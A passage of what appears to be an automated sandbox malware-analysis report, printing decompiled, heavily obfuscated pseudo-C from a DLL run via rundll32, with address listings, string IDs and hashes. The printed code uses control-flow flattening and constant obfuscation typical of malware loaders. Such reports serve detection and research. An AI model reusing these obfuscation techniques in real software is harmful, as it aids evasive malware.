                                                                        				_v1764 = 0xfef7;
                                                                        				_v1764 = _v1764 >> 0xf;
                                                                        				_v1764 = _v1764 ^ 0xb299bfc4;
                                                                        				_v1764 = _v1764 | 0x06f7c44b;
                                                                        				_v1764 = _v1764 ^ 0xb6ffeafa;
                                                                        				_v1676 = 0x7f53;
                                                                        				_v1676 = _v1676 ^ 0x68612cf3;
                                                                        				_v1676 = _v1676 ^ 0x68615bca;
                                                                        				_v1736 = 0xced2;
                                                                        				_v1736 = _v1736 / _t473;
                                                                        				_t474 = 0x45;
                                                                        				_v1736 = _v1736 / _t474;
                                                                        				_v1736 = _v1736 ^ 0x00002bb2;
                                                                        				_v1748 = 0xc83d;
                                                                        				_v1748 = _v1748 | 0xac12259f;
                                                                        				_v1748 = _v1748 + 0xffff4283;
                                                                        				_v1748 = _v1748 ^ 0xac12199f;
                                                                        				_v1696 = 0xff80;
                                                                        				_t475 = 0x51;
                                                                        				_v1696 = _v1696 / _t475;
                                                                        				_v1696 = _v1696 ^ 0x0000122c;
                                                                        				_v1700 = 0x5074;
                                                                        				_v1700 = _v1700 + 0xffffb5cd;
                                                                        				_v1700 = _v1700 ^ 0x0000626a;
                                                                        				_v1668 = 0xce62;
                                                                        				_t476 = 0x5d;
                                                                        				_v1668 = _v1668 / _t476;
                                                                        				_v1668 = _v1668 ^ 0x00006436;
                                                                        				_v1652 = 0x16bc;
                                                                        				_v1652 = _v1652 << 3;
                                                                        				_v1652 = _v1652 ^ 0x0000d776;
                                                                        				_v1664 = 0x5160;
                                                                        				_v1664 = _v1664 + 0xffff7d7f;
                                                                        				_v1664 = _v1664 ^ 0xfffff234;
                                                                        				_v1776 = 0x2bb0;
                                                                        				_v1776 = _v1776 ^ 0xda170107;
                                                                        				_v1776 = _v1776 >> 9;
                                                                        				_v1776 = _v1776 >> 0xa;
                                                                        				_v1776 = _v1776 ^ 0x00006842;
                                                                        				_v1660 = 0xed5a;
                                                                        				_t477 = 0x4f;
                                                                        				_v1660 = _v1660 / _t477;
                                                                        				_v1660 = _v1660 ^ 0x00003872;
                                                                        				_v1708 = 0x88f4;
                                                                        				_v1708 = _v1708 + 0x1364;
                                                                        				_v1708 = _v1708 ^ 0x00009651;
                                                                        				_v1712 = 0x6359;
                                                                        				_v1712 = _v1712 ^ 0x0adc469b;
                                                                        				_t469 = _v1708;
                                                                        				_v1712 = _v1712 * 0x12;
                                                                        				_v1712 = _v1712 ^ 0xc37acb18;
                                                                        				_v1672 = 0x7869;
                                                                        				_v1672 = _v1672 * 0x31;
                                                                        				_v1672 = _v1672 ^ 0x001774dc;
                                                                        				_v1752 = 0x2ad2;
                                                                        				_v1752 = _v1752 + 0x99c0;
                                                                        				_v1752 = _v1752 + 0xffff4378;
                                                                        				_v1752 = _v1752 ^ 0x00000634;
                                                                        				while(1) {
                                                                        					_t457 = 0x2e;
                                                                        					L2:
                                                                        					while(_t416 != 0x34b2b71) {
                                                                        						if(_t416 == 0x5071dc9) {
                                                                        							__eflags = _v1636 & _v1780;
                                                                        							if(__eflags == 0) {
                                                                        								_t403 = _a16( &_v1636, _a12);
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t420 =  ~_t403 & 0x01e56524;
                                                                        								L9:
                                                                        								_t416 = _t420 + 0x36fd2c93;
                                                                        								while(1) {
                                                                        									_t457 = 0x2e;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							__eflags = _v1592 - _t457;
                                                                        							if(_v1592 != _t457) {
                                                                        								L18:
                                                                        								__eflags = _a24;
                                                                        								if(__eflags != 0) {
                                                                        									_push(0x100015c0);
                                                                        									_push(_v1744);
                                                                        									_t410 = E1001BF25(_v1704, _v1772, __eflags);
                                                                        									_pop(_t423);
                                                                        									E100163BF(_t410, __eflags, _v1648, _v1732,  &_v524, _t423, _v1684, _t480,  &_v1592, _v1724);
                                                                        									E10004EA1( &_v524, _v1764, _v1676, _v1736, _a12, _a16, _v1748, _a24);
                                                                        									_t407 = E1001C5F7(_v1696, _v1700, _v1668, _v1652, _t410);
                                                                        									_t482 =  &(_t482[0x11]);
                                                                        									_t457 = 0x2e;
                                                                        								}
                                                                        								L17:
                                                                        								_t416 = 0x38e291b7;
                                                                        								continue;
                                                                        							}
                                                                        							__eflags = _v1590;
                                                                        							if(__eflags == 0) {
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags = _v1590 - _t457;
                                                                        							if(_v1590 != _t457) {
                                                                        								goto L18;
                                                                        							}
                                                                        							__eflags = _v1588;
                                                                        							if(__eflags != 0) {
                                                                        								goto L18;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						if(_t416 == 0x14043b9b) {
                                                                        							_push(0x100015b0);
                                                                        							_push(_v1792);
                                                                        							_t404 = E1001BF25(_v1784, _v1760, __eflags);
                                                                        							_pop(_t429);
                                                                        							E10013D3D(_t404, __eflags, _v1740, _v1800,  &_v1044, _v1720, _t429, _v1768);
                                                                        							_t407 = E1001C5F7(_v1692, _v1788, _v1796, _v1656, _t404);
                                                                        							_t482 =  &(_t482[9]);
                                                                        							_t416 = 0x34b2b71;
                                                                        							while(1) {
                                                                        								_t457 = 0x2e;
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        						if(_t416 == 0x363f5361) {
                                                                        							_t416 = 0x14043b9b;
                                                                        							continue;
                                                                        						}
                                                                        						if(_t416 == 0x36fd2c93) {
                                                                        							return E10001EC9(_v1708, _v1712, _t469, _v1672, _v1752);
                                                                        						}
                                                                        						if(_t416 != 0x38e291b7) {
                                                                        							L24:
                                                                        							__eflags = _t416 - 0x1d1ded50;
                                                                        							if(__eflags != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							return _t407;
                                                                        						}
                                                                        						_t407 = E1001D0A1(_v1664, _t469, _v1776, _v1660,  &_v1636);
                                                                        						_t482 =  &(_t482[3]);
                                                                        						asm("sbb ecx, ecx");
                                                                        						_t420 =  ~_t407 & 0xce09f136;
                                                                        						goto L9;
                                                                        					}
                                                                        					_t400 = E10002577( &_v1044,  &_v1636, _v1728, _v1756, _v1680, _v1688);
                                                                        					_t469 = _t400;
                                                                        					_t482 =  &(_t482[4]);
                                                                        					__eflags = _t400 - 0xffffffff;
                                                                        					if(__eflags == 0) {
                                                                        						_t416 = 0x1d1ded50;
                                                                        						_t457 = 0x2e;
                                                                        						goto L24;
                                                                        					}
                                                                        					_t416 = 0x5071dc9;
                                                                        				}
                                                                        			}

                                                                        0x00000000
                                                                        0x10005545
                                                                        0x1000554e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000554e
                                                                        0x1000544f
                                                                        0x100054b0
                                                                        0x100054b5
                                                                        0x100054c1
                                                                        0x100054c7
                                                                        0x100054e7
                                                                        0x10005503
                                                                        0x10005508
                                                                        0x1000550b
                                                                        0x1000542e
                                                                        0x10005430
                                                                        0x00000000
                                                                        0x10005430
                                                                        0x1000542e
                                                                        0x10005457
                                                                        0x100054a9
                                                                        0x00000000
                                                                        0x100054a9
                                                                        0x1000545f
                                                                        0x00000000
                                                                        0x100056a5
                                                                        0x1000546b
                                                                        0x1000567e
                                                                        0x1000567e
                                                                        0x10005684
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10005684
                                                                        0x1000548d
                                                                        0x10005492
                                                                        0x10005499
                                                                        0x1000549b
                                                                        0x00000000
                                                                        0x1000549b
                                                                        0x1000565d
                                                                        0x10005662
                                                                        0x10005664
                                                                        0x10005667
                                                                        0x1000566a
                                                                        0x10005678
                                                                        0x1000567d
                                                                        0x00000000
                                                                        0x1000567d
                                                                        0x1000566c
                                                                        0x1000566c

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /T$6d$Bh$NO$Sex;$Yc$Z$[*$aS?6$aS?6$b$ix$jb$m$r8${'$0$I$M
                                                                        • API String ID: 0-4291825950
                                                                        • Opcode ID: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
                                                                        • Instruction ID: 8667d57ab57f633c3b350f9276bfc3316d3d5256110005b5da9373a31fbac2ab
                                                                        • Opcode Fuzzy Hash: 9b65fe41b74495a2a11ebe89abe6a38f0661331196ce63fca6bce6fffc707089
                                                                        • Instruction Fuzzy Hash: 7712137150C7819FE364CF21C849A9FBBE2FBC4398F10891DE19A862A0D7B59949CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E1001E19F(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				unsigned int _v120;
                                                                        				signed int _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				signed int _v196;
                                                                        				signed int _v200;
                                                                        				signed int _v204;
                                                                        				signed int _v208;
                                                                        				signed int _v212;
                                                                        				signed int _v216;
                                                                        				signed int _v220;
                                                                        				void* __ecx;
                                                                        				void* _t451;
                                                                        				void* _t486;
                                                                        				signed int _t488;
                                                                        				intOrPtr _t496;
                                                                        				void* _t501;
                                                                        				signed int _t511;
                                                                        				signed int _t515;
                                                                        				signed int _t518;
                                                                        				signed int _t519;
                                                                        				signed int _t520;
                                                                        				signed int _t521;
                                                                        				signed int _t522;
                                                                        				signed int _t523;
                                                                        				signed int _t524;
                                                                        				signed int _t525;
                                                                        				signed int _t526;
                                                                        				signed int _t527;
                                                                        				signed int _t528;
                                                                        				void* _t535;
                                                                        				intOrPtr _t573;
                                                                        				void* _t575;
                                                                        				signed int* _t587;
                                                                        				void* _t590;
                                                                        
                                                                        				_t516 = _a8;
                                                                        				_push(_a8);
                                                                        				_push(_a4);
                                                                        				_push(__edx);
                                                                        				E100056B2(_t451);
                                                                        				_v16 = 0x624f91;
                                                                        				_t587 =  &(( &_v220)[4]);
                                                                        				_v12 = 0x2a04c0;
                                                                        				_v8 = 0x512f64;
                                                                        				_t573 = 0;
                                                                        				_v4 = 0;
                                                                        				_t575 = 0x21d5185e;
                                                                        				_v216 = 0xc140;
                                                                        				_t518 = 0xe;
                                                                        				_v216 = _v216 / _t518;
                                                                        				_v216 = _v216 | 0xdbfffb91;
                                                                        				_v216 = _v216 ^ 0xdbff99d3;
                                                                        				_v168 = 0x2a5e;
                                                                        				_v168 = _v168 ^ 0xa3c44280;
                                                                        				_v168 = _v168 << 9;
                                                                        				_t519 = 0x26;
                                                                        				_v168 = _v168 / _t519;
                                                                        				_v168 = _v168 ^ 0x03993ad3;
                                                                        				_v192 = 0x18c2;
                                                                        				_v192 = _v192 ^ 0xd0e63b27;
                                                                        				_v192 = _v192 ^ 0xef30ec67;
                                                                        				_t36 =  &_v192; // 0xef30ec67
                                                                        				_t520 = 0x16;
                                                                        				_v192 =  *_t36 / _t520;
                                                                        				_v192 = _v192 ^ 0x02e65ae3;
                                                                        				_v28 = 0x8b75;
                                                                        				_t521 = 0x66;
                                                                        				_v28 = _v28 / _t521;
                                                                        				_v28 = _v28 ^ 0x0000015f;
                                                                        				_v116 = 0x1a67;
                                                                        				_v116 = _v116 ^ 0x4b480ab8;
                                                                        				_v116 = _v116 + 0xffffe6d8;
                                                                        				_v116 = _v116 ^ 0x4b47f7f7;
                                                                        				_v164 = 0xf9a1;
                                                                        				_v164 = _v164 + 0xce44;
                                                                        				_t522 = 0x15;
                                                                        				_v164 = _v164 / _t522;
                                                                        				_v164 = _v164 * 0x64;
                                                                        				_v164 = _v164 ^ 0xf0087ab4;
                                                                        				_v104 = 0x8783;
                                                                        				_v104 = _v104 >> 9;
                                                                        				_v104 = _v104 << 7;
                                                                        				_v104 = _v104 ^ 0x000005ac;
                                                                        				_v68 = 0xc586;
                                                                        				_v68 = _v68 * 0x2a;
                                                                        				_v68 = _v68 ^ 0x00202599;
                                                                        				_v40 = 0xd110;
                                                                        				_v40 = _v40 | 0x671d2d67;
                                                                        				_v40 = _v40 ^ 0x671d8efb;
                                                                        				_v100 = 0x326d;
                                                                        				_v100 = _v100 ^ 0xf0f4e5fa;
                                                                        				_v100 = _v100 << 6;
                                                                        				_v100 = _v100 ^ 0x3d35bfd9;
                                                                        				_v48 = 0x7d57;
                                                                        				_t523 = 0x63;
                                                                        				_v48 = _v48 * 0x6e;
                                                                        				_v48 = _v48 ^ 0x0035e190;
                                                                        				_v156 = 0xbe8d;
                                                                        				_v156 = _v156 | 0xda6f2624;
                                                                        				_v156 = _v156 + 0xdae9;
                                                                        				_v156 = _v156 | 0xe9accc97;
                                                                        				_v156 = _v156 ^ 0xfbfc818b;
                                                                        				_v108 = 0xbce1;
                                                                        				_v108 = _v108 ^ 0x7ee51402;
                                                                        				_v108 = _v108 + 0xffff7bea;
                                                                        				_v108 = _v108 ^ 0x7ee5758f;
                                                                        				_v56 = 0x8521;
                                                                        				_v56 = _v56 ^ 0x357a7630;
                                                                        				_v56 = _v56 ^ 0x357a8a2f;
                                                                        				_v124 = 0x158;
                                                                        				_v124 = _v124 + 0xffffb1a8;
                                                                        				_v124 = _v124 | 0x92d6cfda;
                                                                        				_v124 = _v124 ^ 0xffffc67a;
                                                                        				_v172 = 0xab3b;
                                                                        				_v172 = _v172 | 0xe0b1ec5b;
                                                                        				_v172 = _v172 ^ 0xbad91e0a;
                                                                        				_v172 = _v172 + 0xa707;
                                                                        				_v172 = _v172 ^ 0x5a69f167;
                                                                        				_v96 = 0xed9e;
                                                                        				_v96 = _v96 + 0x6931;
                                                                        				_v96 = _v96 ^ 0x00013b1d;
                                                                        				_v208 = 0xc215;
                                                                        				_v208 = _v208 + 0xb2e7;
                                                                        				_v208 = _v208 ^ 0x39f9ff48;
                                                                        				_v208 = _v208 + 0x9ab9;
                                                                        				_v208 = _v208 ^ 0x39f93b82;
                                                                        				_v112 = 0x3498;
                                                                        				_v112 = _v112 + 0x4bc6;
                                                                        				_v112 = _v112 / _t523;
                                                                        				_v112 = _v112 ^ 0x00004366;
                                                                        				_v220 = 0x48;
                                                                        				_v220 = _v220 | 0xadbd3685;
                                                                        				_t524 = 0x25;
                                                                        				_v220 = _v220 / _t524;
                                                                        				_v220 = _v220 + 0xbcbb;
                                                                        				_v220 = _v220 ^ 0x04b294b8;
                                                                        				_v160 = 0x4d28;
                                                                        				_v160 = _v160 >> 3;
                                                                        				_t525 = 0x58;
                                                                        				_v160 = _v160 * 0xb;
                                                                        				_v160 = _v160 / _t525;
                                                                        				_v160 = _v160 ^ 0x00006f26;
                                                                        				_v60 = 0xbd2;
                                                                        				_v60 = _v60 + 0xffff7eef;
                                                                        				_v60 = _v60 ^ 0xffffcc99;
                                                                        				_v32 = 0x1812;
                                                                        				_v32 = _v32 + 0xffff0573;
                                                                        				_v32 = _v32 ^ 0xffff5502;
                                                                        				_v132 = 0x7f72;
                                                                        				_t526 = 0x75;
                                                                        				_v132 = _v132 / _t526;
                                                                        				_v132 = _v132 + 0xb09c;
                                                                        				_v132 = _v132 ^ 0x000095d1;
                                                                        				_v188 = 0x9149;
                                                                        				_v188 = _v188 | 0xa4dde4e7;
                                                                        				_v188 = _v188 + 0x1385;
                                                                        				_v188 = _v188 << 0xe;
                                                                        				_v188 = _v188 ^ 0x825d3d05;
                                                                        				_v152 = 0x592e;
                                                                        				_t527 = 0x28;
                                                                        				_v152 = _v152 * 0x2c;
                                                                        				_v152 = _v152 ^ 0x9c2a3110;
                                                                        				_v152 = _v152 ^ 0x9c255458;
                                                                        				_v196 = 0x1135;
                                                                        				_v196 = _v196 + 0xfffff425;
                                                                        				_v196 = _v196 >> 6;
                                                                        				_v196 = _v196 ^ 0xbfbf1d5b;
                                                                        				_v196 = _v196 ^ 0xbfbf60c8;
                                                                        				_v204 = 0xcc36;
                                                                        				_v204 = _v204 * 0xe;
                                                                        				_v204 = _v204 >> 1;
                                                                        				_v204 = _v204 << 0xa;
                                                                        				_v204 = _v204 ^ 0x1655baac;
                                                                        				_v212 = 0xe9d4;
                                                                        				_v212 = _v212 + 0xffff7206;
                                                                        				_v212 = _v212 + 0x7a90;
                                                                        				_v212 = _v212 ^ 0x86b4db23;
                                                                        				_v212 = _v212 ^ 0x86b43879;
                                                                        				_v180 = 0xccf3;
                                                                        				_v180 = _v180 ^ 0xb9c8351b;
                                                                        				_v180 = _v180 | 0x98038e8f;
                                                                        				_v180 = _v180 * 0x49;
                                                                        				_v180 = _v180 ^ 0xfb2bf902;
                                                                        				_v64 = 0x9efe;
                                                                        				_v64 = _v64 + 0xfffffaef;
                                                                        				_v64 = _v64 ^ 0x0000b4c9;
                                                                        				_v72 = 0xd172;
                                                                        				_v72 = _v72 | 0x8d5131d7;
                                                                        				_v72 = _v72 ^ 0x8d51ace7;
                                                                        				_v120 = 0x59d5;
                                                                        				_v120 = _v120 + 0xffffff6e;
                                                                        				_v120 = _v120 >> 6;
                                                                        				_v120 = _v120 ^ 0x00005703;
                                                                        				_v84 = 0xde85;
                                                                        				_v84 = _v84 ^ 0x89f562d5;
                                                                        				_v84 = _v84 ^ 0x89f58b7f;
                                                                        				_v52 = 0x311b;
                                                                        				_v52 = _v52 << 1;
                                                                        				_v52 = _v52 ^ 0x00002d97;
                                                                        				_v184 = 0xdffe;
                                                                        				_v184 = _v184 ^ 0xc31def80;
                                                                        				_v184 = _v184 << 1;
                                                                        				_v184 = _v184 * 0xe;
                                                                        				_v184 = _v184 ^ 0x573173b9;
                                                                        				_v144 = 0x2421;
                                                                        				_v144 = _v144 * 0x7e;
                                                                        				_v144 = _v144 + 0xffffbdf8;
                                                                        				_v144 = _v144 ^ 0x0011d9fd;
                                                                        				_v140 = 0xb5be;
                                                                        				_v140 = _v140 + 0xffff1138;
                                                                        				_v140 = _v140 ^ 0xaa88dcf7;
                                                                        				_v140 = _v140 ^ 0x55773d43;
                                                                        				_v44 = 0x6427;
                                                                        				_v44 = _v44 ^ 0x73b6b443;
                                                                        				_v44 = _v44 ^ 0x73b6c2cf;
                                                                        				_v76 = 0xab83;
                                                                        				_v76 = _v76 >> 0xd;
                                                                        				_v76 = _v76 ^ 0x00003dd9;
                                                                        				_v176 = 0xa297;
                                                                        				_v176 = _v176 + 0x40d1;
                                                                        				_v176 = _v176 / _t527;
                                                                        				_v176 = _v176 >> 0xb;
                                                                        				_v176 = _v176 ^ 0x0000189d;
                                                                        				_v136 = 0x856e;
                                                                        				_v136 = _v136 << 0xf;
                                                                        				_v136 = _v136 >> 0x10;
                                                                        				_v136 = _v136 ^ 0x00004166;
                                                                        				_v200 = 0x9381;
                                                                        				_v200 = _v200 << 5;
                                                                        				_v200 = _v200 + 0xcf90;
                                                                        				_t528 = 0x3c;
                                                                        				_v200 = _v200 / _t528;
                                                                        				_v200 = _v200 ^ 0x000016ff;
                                                                        				_v80 = 0x8f73;
                                                                        				_v80 = _v80 + 0xffffab60;
                                                                        				_v80 = _v80 ^ 0x00004f6d;
                                                                        				_v88 = 0xa0c7;
                                                                        				_v88 = _v88 ^ 0xf6585f6c;
                                                                        				_v88 = _v88 ^ 0xf658d2ca;
                                                                        				_v148 = 0x53c;
                                                                        				_v148 = _v148 << 9;
                                                                        				_v148 = _v148 << 0x10;
                                                                        				_v148 = _v148 ^ 0x7800710d;
                                                                        				_v36 = 0x1d9;
                                                                        				_v36 = _v36 + 0x3c9e;
                                                                        				_v36 = _v36 ^ 0x00013e77;
                                                                        				_v92 = 0x5eee;
                                                                        				_v92 = _v92 + 0xffffe50b;
                                                                        				_v92 = _v92 ^ 0x000043ea;
                                                                        				_v128 = 0xff6;
                                                                        				_v128 = _v128 >> 0xd;
                                                                        				_v128 = _v128 >> 6;
                                                                        				_v128 = _v128 ^ 0x00000001;
                                                                        				goto L1;
                                                                        				do {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t590 = _t575 - 0x21d5185e;
                                                                        						if(_t590 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t590 == 0) {
                                                                        							_t535 = 0x2c;
                                                                        							_t496 = E100157E8(_t535);
                                                                        							 *0x100221b4 = _t496;
                                                                        							_t528 = _t528;
                                                                        							if(_t496 != 0) {
                                                                        								_t575 = 0x235d3418;
                                                                        								continue;
                                                                        							}
                                                                        						} else {
                                                                        							if(_t575 == 0x1d010d0) {
                                                                        								_t528 = _v44;
                                                                        								_t501 = E10008F73(_t528, _v76,  *((intOrPtr*)( *0x100221b4 + 4)), _t528, _v176, _v136, _t528, _v200, _v168,  *0x100221b4 + 0x10);
                                                                        								_t587 =  &(_t587[8]);
                                                                        								if(_t501 != 0) {
                                                                        									_t573 = 1;
                                                                        								} else {
                                                                        									_t575 = 0x2ad17601;
                                                                        									continue;
                                                                        								}
                                                                        							} else {
                                                                        								if(_t575 == 0x2a7485f) {
                                                                        									_push(_t528);
                                                                        									E10008A8C( *((intOrPtr*)( *0x100221b4 + 4)));
                                                                        									_t528 = _t528;
                                                                        									_t575 = 0xea2ab84;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t575 == 0x6da30e1) {
                                                                        										_push(_t528);
                                                                        										E1000AC80( *((intOrPtr*)( *0x100221b4 + 0x14)));
                                                                        										_t528 = _t528;
                                                                        										_t575 = 0x2a7485f;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t575 == 0xea2ab84) {
                                                                        											E100091CD(_v40, _v100, _v48,  *0x100221b4, _v156);
                                                                        										} else {
                                                                        											if(_t575 != 0x16122494) {
                                                                        												goto L25;
                                                                        											} else {
                                                                        												_push(_t528);
                                                                        												_t528 = _v184;
                                                                        												_t511 = E1000AB96(_t528, _v144, _v216, _v140, _v28,  *((intOrPtr*)( *0x100221b4 + 4)));
                                                                        												_t587 =  &(_t587[5]);
                                                                        												asm("sbb esi, esi");
                                                                        												_t575 = ( ~_t511 & 0xfaf5dfef) + 0x6da30e1;
                                                                        												continue;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L29:
                                                                        						return _t573;
                                                                        					}
                                                                        					if(_t575 == 0x235d3418) {
                                                                        						_push(_t528);
                                                                        						_t528 = _v164 | _v116;
                                                                        						_t486 = E10003BCD(_t528, _v108, _v56, _v124, _t528, _v172, _t528,  *0x100221b4 + 4);
                                                                        						_t587 =  &(_t587[7]);
                                                                        						if(_t486 == 0) {
                                                                        							_t575 = 0xea2ab84;
                                                                        							goto L25;
                                                                        						} else {
                                                                        							_t575 = 0x2b13f55e;
                                                                        							goto L1;
                                                                        						}
                                                                        					} else {
                                                                        						if(_t575 == 0x261556b7) {
                                                                        							_t488 = E10007A59(_v132, _v188, _v24,  *0x100221b4, _v20,  *((intOrPtr*)( *0x100221b4 + 4)),  *0x100221b4 + 0x14, _v152, _v196, _t528, _v204, _v212);
                                                                        							_t528 = _v180;
                                                                        							asm("sbb esi, esi");
                                                                        							_t575 = ( ~_t488 & 0x136adc35) + 0x2a7485f;
                                                                        							E10007BE0(_t528, _v24, _v64, _v72);
                                                                        							_t587 =  &(_t587[0xc]);
                                                                        							goto L25;
                                                                        						} else {
                                                                        							if(_t575 == 0x2ad17601) {
                                                                        								_push(_t528);
                                                                        								E1000AC80( *((intOrPtr*)( *0x100221b4)));
                                                                        								_t528 = _t528;
                                                                        								_t575 = 0x6da30e1;
                                                                        								goto L1;
                                                                        							} else {
                                                                        								if(_t575 != 0x2b13f55e) {
                                                                        									goto L25;
                                                                        								} else {
                                                                        									_push(_t528);
                                                                        									_t528 =  &_v20;
                                                                        									_t515 = E1000CC2A(_t528, _v92,  *_t516, _v112, _v220, _v160, _v128 | _v36,  &_v24, _v60,  *((intOrPtr*)(_t516 + 4)), _v32, _v192);
                                                                        									_t587 =  &(_t587[0xb]);
                                                                        									asm("sbb esi, esi");
                                                                        									_t575 = ( ~_t515 & 0x236e0e58) + 0x2a7485f;
                                                                        									goto L1;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L29;
                                                                        					L25:
                                                                        				} while (_t575 != 0x1e355eb8);
                                                                        				goto L29;
                                                                        			}


















































































                                                                        0x1001e88f
                                                                        0x1001e894
                                                                        0x1001e89c
                                                                        0x1001e8a7
                                                                        0x1001e8b2
                                                                        0x1001e8bd
                                                                        0x1001e8c8
                                                                        0x1001e8d3
                                                                        0x1001e8de
                                                                        0x1001e8e6
                                                                        0x1001e8eb
                                                                        0x1001e8f0
                                                                        0x1001e8f0
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8f5
                                                                        0x1001e8fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001e901
                                                                        0x1001ea28
                                                                        0x1001ea29
                                                                        0x1001ea2e
                                                                        0x1001ea33
                                                                        0x1001ea36
                                                                        0x1001ea3c
                                                                        0x00000000
                                                                        0x1001ea3c
                                                                        0x1001e907
                                                                        0x1001e90d
                                                                        0x1001e9f3
                                                                        0x1001e9fd
                                                                        0x1001ea02
                                                                        0x1001ea07
                                                                        0x1001ebf8
                                                                        0x1001ea0d
                                                                        0x1001ea0d
                                                                        0x00000000
                                                                        0x1001ea0d
                                                                        0x1001e913
                                                                        0x1001e915
                                                                        0x1001e9b6
                                                                        0x1001e9bb
                                                                        0x1001e9c1
                                                                        0x1001e9c2
                                                                        0x00000000
                                                                        0x1001e91b
                                                                        0x1001e921
                                                                        0x1001e98c
                                                                        0x1001e997
                                                                        0x1001e99d
                                                                        0x1001e99e
                                                                        0x00000000
                                                                        0x1001e923
                                                                        0x1001e929
                                                                        0x1001ebec
                                                                        0x1001e92f
                                                                        0x1001e935
                                                                        0x00000000
                                                                        0x1001e93b
                                                                        0x1001e940
                                                                        0x1001e957
                                                                        0x1001e95b
                                                                        0x1001e960
                                                                        0x1001e967
                                                                        0x1001e96f
                                                                        0x00000000
                                                                        0x1001e96f
                                                                        0x1001e935
                                                                        0x1001e929
                                                                        0x1001e921
                                                                        0x1001e915
                                                                        0x1001e90d
                                                                        0x1001ebf9
                                                                        0x1001ec05
                                                                        0x1001ec05
                                                                        0x1001ea4c
                                                                        0x1001eb79
                                                                        0x1001eb96
                                                                        0x1001eba4
                                                                        0x1001eba9
                                                                        0x1001ebae
                                                                        0x1001ebba
                                                                        0x00000000
                                                                        0x1001ebb0
                                                                        0x1001ebb0
                                                                        0x00000000
                                                                        0x1001ebb0
                                                                        0x1001ea52
                                                                        0x1001ea58
                                                                        0x1001eb3e
                                                                        0x1001eb5c
                                                                        0x1001eb60
                                                                        0x1001eb68
                                                                        0x1001eb6a
                                                                        0x1001eb6f
                                                                        0x00000000
                                                                        0x1001ea5e
                                                                        0x1001ea64
                                                                        0x1001eaeb
                                                                        0x1001eaf5
                                                                        0x1001eafb
                                                                        0x1001eafc
                                                                        0x00000000
                                                                        0x1001ea66
                                                                        0x1001ea6c
                                                                        0x00000000
                                                                        0x1001ea72
                                                                        0x1001ea72
                                                                        0x1001ea85
                                                                        0x1001eabe
                                                                        0x1001eac3
                                                                        0x1001eaca
                                                                        0x1001ead2
                                                                        0x00000000
                                                                        0x1001ead2
                                                                        0x1001ea6c
                                                                        0x1001ea64
                                                                        0x1001ea58
                                                                        0x00000000
                                                                        0x1001ebbf
                                                                        0x1001ebbf
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
                                                                        • API String ID: 0-3046912973
                                                                        • Opcode ID: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
                                                                        • Instruction ID: a67a5d6662a05d5da01197eb55bbec18b74cc61d11ec80b6fdc783dee153aef3
